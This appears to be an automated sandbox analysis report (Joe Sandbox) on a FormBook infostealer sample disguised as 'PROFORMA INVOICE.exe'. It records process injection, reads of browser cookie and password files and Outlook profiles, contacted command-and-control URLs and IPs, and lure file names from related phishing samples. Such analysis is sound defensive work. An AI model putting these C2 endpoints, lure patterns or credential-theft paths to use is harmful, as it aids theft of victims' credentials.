Source: C:\Windows\SysWOW64\ktmutil.exe

Thread APC queued: target process: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 31AE008

Jump to behavior

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00F9B106 LogonUserW,

0_2_00F9B106

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00F63D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00F63D19

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00FA411C SendInput,keybd_event,

0_2_00FA411C

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00FA74E7 mouse_event,

0_2_00FA74E7

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PROFORMA INVOICE.exe"	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	Process created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"	Jump to behavior
Source: C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe	Process created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

0_2_00F9A66C

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00FA71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00FA71FA

Source: PROFORMA INVOICE.exe, qWxlULNrWdo.exe, 00000003.00000000.1883624549.00000000018D0000.00000002.00000001.00040000.00000000.sdmp, qWxlULNrWdo.exe, 00000003.00000002.3556244137.00000000018D0000.00000002.00000001.00040000.00000000.sdmp, qWxlULNrWdo.exe, 00000008.00000000.2034587982.00000000010C0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: qWxlULNrWdo.exe, 00000003.00000000.1883624549.00000000018D0000.00000002.00000001.00040000.00000000.sdmp, qWxlULNrWdo.exe, 00000003.00000002.3556244137.00000000018D0000.00000002.00000001.00040000.00000000.sdmp, qWxlULNrWdo.exe, 00000008.00000000.2034587982.00000000010C0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: PROFORMA INVOICE.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: qWxlULNrWdo.exe, 00000003.00000000.1883624549.00000000018D0000.00000002.00000001.00040000.00000000.sdmp, qWxlULNrWdo.exe, 00000003.00000002.3556244137.00000000018D0000.00000002.00000001.00040000.00000000.sdmp, qWxlULNrWdo.exe, 00000008.00000000.2034587982.00000000010C0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: qWxlULNrWdo.exe, 00000003.00000000.1883624549.00000000018D0000.00000002.00000001.00040000.00000000.sdmp, qWxlULNrWdo.exe, 00000003.00000002.3556244137.00000000018D0000.00000002.00000001.00040000.00000000.sdmp, qWxlULNrWdo.exe, 00000008.00000000.2034587982.00000000010C0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00F865C4 cpuid

0_2_00F865C4

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00FB091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,

0_2_00FB091D

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00FDB340 GetUserNameW,

0_2_00FDB340

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00F91E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00F91E8E

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe

Code function: 0_2_00F7DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00F7DDC0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1966199008.0000000006E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3555099409.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3556751373.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1958657577.00000000051E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1958001849.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3559031904.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3556631891.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3556728136.00000000043A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\ktmutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\ktmutil.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: PROFORMA INVOICE.exe	Binary or memory string: WIN_81
Source: PROFORMA INVOICE.exe	Binary or memory string: WIN_XP
Source: PROFORMA INVOICE.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: PROFORMA INVOICE.exe	Binary or memory string: WIN_XPe
Source: PROFORMA INVOICE.exe	Binary or memory string: WIN_VISTA
Source: PROFORMA INVOICE.exe	Binary or memory string: WIN_7
Source: PROFORMA INVOICE.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1966199008.0000000006E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3555099409.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3556751373.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1958657577.00000000051E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1958001849.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3559031904.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3556631891.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3556728136.00000000043A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FB8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00FB8C4F
Source: C:\Users\user\Desktop\PROFORMA INVOICE.exe	Code function: 0_2_00FB923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00FB923B

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	3 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	5 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	5 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PROFORMA INVOICE.exe	37%	ReversingLabs	Win32.Trojan.AutoitInject
PROFORMA INVOICE.exe	25%	Virustotal		Browse
PROFORMA INVOICE.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
mcfunding.org	0%	Virustotal	Browse
d63dm.top	0%	Virustotal	Browse
www.huiguang.xyz	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://www.servannto.site/h26k/	0%	Avira URL Cloud	safe
http://www.d63dm.top/rqnz/?R4qXin=76huNjt+Arc+fPcFGkrGedsPXjdBvzRuYOqfGZIequmDvyuWFmMJMF1Z7BKJ7tjr9vaKr64/B4AayP3kwCu5tbMSaPOALNuAB6ZkqasdgIxv5yPN3CQ/0Z4=&A69pk=_b0Tr07p9f0pn	0%	Avira URL Cloud	safe
http://www.klohk.tech/3m3e/?R4qXin=AG8wkc12D4O4qfEwAs2juVKQc9rSxhRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cNdpOWkpvpmQUiiaCEh/01bYK5u1RRn/kwMI=&A69pk=_b0Tr07p9f0pn	0%	Avira URL Cloud	safe
http://www.migorengya8.click/y3dc/	0%	Avira URL Cloud	safe
http://www.futurevision.life/hxmz/	0%	Avira URL Cloud	safe
http://www.telforce.one/ykhz/	0%	Avira URL Cloud	safe
http://www.klohk.tech/3m3e/	0%	Avira URL Cloud	safe
http://www.cesach.net	0%	Avira URL Cloud	safe
http://www.beingandbecoming.ltd/79tr/?R4qXin=vB4016rwfH0Mxta3WHz8fHaIVIRa7jPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZP8AE/MzANUKvMVkOqK7vCy8Yr4bj2qmMHLkQ=&A69pk=_b0Tr07p9f0pn	0%	Avira URL Cloud	safe
https://login.live.c	0%	Avira URL Cloud	safe
http://www.mcfunding.org/0598/	0%	Avira URL Cloud	safe
http://www.servannto.site/h26k/?R4qXin=3BjO5l4trS+mOtJJJG3yLOLYEPQxRCXXfOCWIFV4tkiUomDH7G5wxffcY7A/EhE+G/r5frF5I7R9nf11AZCcJ7681zBJff7eDJ/XOLmbyjnrIh14rmHejEU=&A69pk=_b0Tr07p9f0pn	0%	Avira URL Cloud	safe
http://www.beingandbecoming.ltd/79tr/	0%	Avira URL Cloud	safe
http://www.d63dm.top/rqnz/	0%	Avira URL Cloud	safe
http://www.migorengya8.click/y3dc/?R4qXin=ihLGZn7rk3oJmiIz33Bz1E4xhZDY72dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tRERgPwyb4b9y8rXeUu2h/5aaRRGXSXrvcfb4U=&A69pk=_b0Tr07p9f0pn	0%	Avira URL Cloud	safe
http://www.mcfunding.org/0598/?R4qXin=t68BN09iVeqb/IuMYFog8KGcDQiER6CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dOWWiTyMXvF8kyx1KEOeQXc/yVhXxnErc2M=&A69pk=_b0Tr07p9f0pn	0%	Avira URL Cloud	safe
http://www.klohk.tech/3m3e/?R4qXin=AG8wkc12D4O4qfEwAs2juVKQc9rSxhRu	0%	Avira URL Cloud	safe
http://www.cesach.net/qutj/	0%	Avira URL Cloud	safe
http://www.huiguang.xyz/hv6g/?A69pk=_b0Tr07p9f0pn&R4qXin=vSitAQgQO9xnWjtO9fvjetkh7TKEKyOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGP+O9AD54eipMHpO96aeC1LnvmikAK9niWdM=	0%	Avira URL Cloud	safe
http://www.futurevision.life/hxmz/?A69pk=_b0Tr07p9f0pn&R4qXin=xeYt+TVrluKccowmz5a5GltLZ9YZ3snijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H70c0RaNOmwh+TnBkmQn+jSxAt6pokQYbXkws=	0%	Avira URL Cloud	safe
https://34.92.79.175:19817/register	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mcfunding.org	3.33.130.190	true	true	0%, Virustotal, Browse	unknown
d63dm.top	154.23.184.218	true	true	0%, Virustotal, Browse	unknown
www.huiguang.xyz	154.92.61.37	true	true	1%, Virustotal, Browse	unknown
www.servannto.site	31.31.196.17	true	true		unknown
www.klohk.tech	103.224.182.242	true	true		unknown
www.telforce.one	64.190.63.222	true	true		unknown
beingandbecoming.ltd	3.33.130.190	true	true		unknown
migorengya8.click	198.252.98.54	true	true		unknown
www.cesach.net	217.76.156.252	true	true		unknown
www.futurevision.life	203.161.49.193	true	true		unknown
schedulemassage.xyz	3.33.130.190	true	true		unknown
www.beingandbecoming.ltd	unknown	unknown	false		unknown
www.migorengya8.click	unknown	unknown	false		unknown
www.mcfunding.org	unknown	unknown	false		unknown
www.d63dm.top	unknown	unknown	false		unknown
www.schedulemassage.xyz	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.migorengya8.click/y3dc/	true	Avira URL Cloud: safe	unknown
http://www.klohk.tech/3m3e/?R4qXin=AG8wkc12D4O4qfEwAs2juVKQc9rSxhRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cNdpOWkpvpmQUiiaCEh/01bYK5u1RRn/kwMI=&A69pk=_b0Tr07p9f0pn	true	Avira URL Cloud: safe	unknown
http://www.servannto.site/h26k/	true	Avira URL Cloud: safe	unknown
http://www.futurevision.life/hxmz/	true	Avira URL Cloud: safe	unknown
http://www.klohk.tech/3m3e/	true	Avira URL Cloud: safe	unknown
http://www.telforce.one/ykhz/	true	Avira URL Cloud: safe	unknown
http://www.d63dm.top/rqnz/?R4qXin=76huNjt+Arc+fPcFGkrGedsPXjdBvzRuYOqfGZIequmDvyuWFmMJMF1Z7BKJ7tjr9vaKr64/B4AayP3kwCu5tbMSaPOALNuAB6ZkqasdgIxv5yPN3CQ/0Z4=&A69pk=_b0Tr07p9f0pn	true	Avira URL Cloud: safe	unknown
http://www.beingandbecoming.ltd/79tr/?R4qXin=vB4016rwfH0Mxta3WHz8fHaIVIRa7jPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZP8AE/MzANUKvMVkOqK7vCy8Yr4bj2qmMHLkQ=&A69pk=_b0Tr07p9f0pn	true	Avira URL Cloud: safe	unknown
http://www.beingandbecoming.ltd/79tr/	true	Avira URL Cloud: safe	unknown
http://www.servannto.site/h26k/?R4qXin=3BjO5l4trS+mOtJJJG3yLOLYEPQxRCXXfOCWIFV4tkiUomDH7G5wxffcY7A/EhE+G/r5frF5I7R9nf11AZCcJ7681zBJff7eDJ/XOLmbyjnrIh14rmHejEU=&A69pk=_b0Tr07p9f0pn	true	Avira URL Cloud: safe	unknown
http://www.d63dm.top/rqnz/	true	Avira URL Cloud: safe	unknown
http://www.mcfunding.org/0598/	true	Avira URL Cloud: safe	unknown
http://www.migorengya8.click/y3dc/?R4qXin=ihLGZn7rk3oJmiIz33Bz1E4xhZDY72dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tRERgPwyb4b9y8rXeUu2h/5aaRRGXSXrvcfb4U=&A69pk=_b0Tr07p9f0pn	true	Avira URL Cloud: safe	unknown
http://www.cesach.net/qutj/	true	Avira URL Cloud: safe	unknown
http://www.mcfunding.org/0598/?R4qXin=t68BN09iVeqb/IuMYFog8KGcDQiER6CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dOWWiTyMXvF8kyx1KEOeQXc/yVhXxnErc2M=&A69pk=_b0Tr07p9f0pn	true	Avira URL Cloud: safe	unknown
http://www.huiguang.xyz/hv6g/?A69pk=_b0Tr07p9f0pn&R4qXin=vSitAQgQO9xnWjtO9fvjetkh7TKEKyOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGP+O9AD54eipMHpO96aeC1LnvmikAK9niWdM=	true	Avira URL Cloud: safe	unknown
http://www.futurevision.life/hxmz/?A69pk=_b0Tr07p9f0pn&R4qXin=xeYt+TVrluKccowmz5a5GltLZ9YZ3snijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H70c0RaNOmwh+TnBkmQn+jSxAt6pokQYbXkws=	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	ktmutil.exe, 00000005.00000002.3560003786.0000000007A5E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	ktmutil.exe, 00000005.00000002.3560003786.0000000007A5E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.cesach.net	qWxlULNrWdo.exe, 00000008.00000002.3559031904.0000000004F2C000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.live.c	ktmutil.exe, 00000005.00000002.3555301986.0000000002C4D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	ktmutil.exe, 00000005.00000002.3560003786.0000000007A5E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	ktmutil.exe, 00000005.00000002.3560003786.0000000007A5E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	ktmutil.exe, 00000005.00000002.3560003786.0000000007A5E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://hm.baidu.com/hm.js?874f82fc659e5acd8a958bbf89041d1f	ktmutil.exe, 00000005.00000002.3557624704.0000000003CA4000.00000004.10000000.00040000.00000000.sdmp, qWxlULNrWdo.exe, 00000008.00000002.3556864770.0000000002E54000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2265030453.0000000006554000.00000004.80000000.00040000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	ktmutil.exe, 00000005.00000002.3560003786.0000000007A5E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	ktmutil.exe, 00000005.00000002.3560003786.0000000007A5E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.klohk.tech/3m3e/?R4qXin=AG8wkc12D4O4qfEwAs2juVKQc9rSxhRu	qWxlULNrWdo.exe, 00000008.00000002.3556864770.00000000037C0000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	ktmutil.exe, 00000005.00000002.3560003786.0000000007A5E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://34.92.79.175:19817/register	ktmutil.exe, 00000005.00000002.3557624704.0000000003CA4000.00000004.10000000.00040000.00000000.sdmp, qWxlULNrWdo.exe, 00000008.00000002.3556864770.0000000002E54000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2265030453.0000000006554000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
203.161.49.193	www.futurevision.life	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	true
31.31.196.17	www.servannto.site	Russian Federation	197695	AS-REGRU	true
103.224.182.242	www.klohk.tech	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	true
154.92.61.37	www.huiguang.xyz	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	true
198.252.98.54	migorengya8.click	Canada	20068	HAWKHOSTCA	true
64.190.63.222	www.telforce.one	United States	11696	NBS11696US	true
154.23.184.218	d63dm.top	United States	174	COGENT-174US	true
3.33.130.190	mcfunding.org	United States	8987	AMAZONEXPANSIONGB	true
217.76.156.252	www.cesach.net	Spain	8560	ONEANDONE-ASBrauerstrasse48DE	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1556192
Start date and time:	2024-11-15 04:19:59 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PROFORMA INVOICE.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@9/3@11/9
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 95% Number of executed functions: 52 Number of non-executed functions: 292
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target qWxlULNrWdo.exe, PID 2060 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
203.161.49.193	Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	FormBook	Browse	www.futurevision.life/cadc/?mRu=yfxAwDfWka0dfjkEErxT6WYgWaOc4HN689PIo8avXNW9JAsEk9V7nvZjppH3ozqb+GZGdofwBlLzR01W2aLtY3/CfTpxh0qnHwCWqwdq33lIMBmS8NPwCm4=&UJ=7H1XM
	Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.eco-tops.website/n54u/
	Shipping documents..exe	Get hash	malicious	FormBook	Browse	www.futurevision.life/hxmz/
	DHL_IMPORT_8236820594.exe	Get hash	malicious	FormBook	Browse	www.harmonid.life/aq3t/
	DHL_IMPORT_8236820594.exe	Get hash	malicious	FormBook	Browse	www.harmonid.life/aq3t/
	Statement Cargomind 2024-09-12 (K07234).exe	Get hash	malicious	FormBook	Browse	www.fitlifa.xyz/6tsn/
	Payment&WarantyBonds.exe	Get hash	malicious	FormBook	Browse	www.simplek.top/ep69/
	Payment&WarantyBonds.exe	Get hash	malicious	FormBook	Browse	www.simplek.top/ep69/
	SALARY OF OCT 2024.exe	Get hash	malicious	FormBook	Browse	www.futurevision.life/hxmz/
	Udspecialiser45.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.funtechie.top/udud/
31.31.196.17	Shipping documents..exe	Get hash	malicious	FormBook	Browse	www.servannto.site/h26k/
	wODub61gZe.exe	Get hash	malicious	FormBook	Browse	www.dverkom.store/sflr/
	r6lOHDg9N9.exe	Get hash	malicious	FormBook	Browse	www.dverkom.store/p6ze/
	URGENT REQUEST FOR QUOTATION.exe	Get hash	malicious	FormBook	Browse	www.dverkom.store/66j2/
	FW CMA SHZ Freight invoice CHN1080769.exe	Get hash	malicious	FormBook	Browse	www.dverkom.store/66j2/
	Purchase_Order_pdf.exe	Get hash	malicious	FormBook	Browse	www.dverkom.store/fbcx/
	SALARY OF OCT 2024.exe	Get hash	malicious	FormBook	Browse	www.servannto.site/h26k/
	3wgZ0nlbTe.exe	Get hash	malicious	FormBook	Browse	www.dverkom.store/7hot/
	RFQ REF-JTCAJC-QINHP5-TIS-L0009- (AL DHAFRA) AL JABER - SUPPLY.exe	Get hash	malicious	FormBook	Browse	www.dverkom.store/7hot/
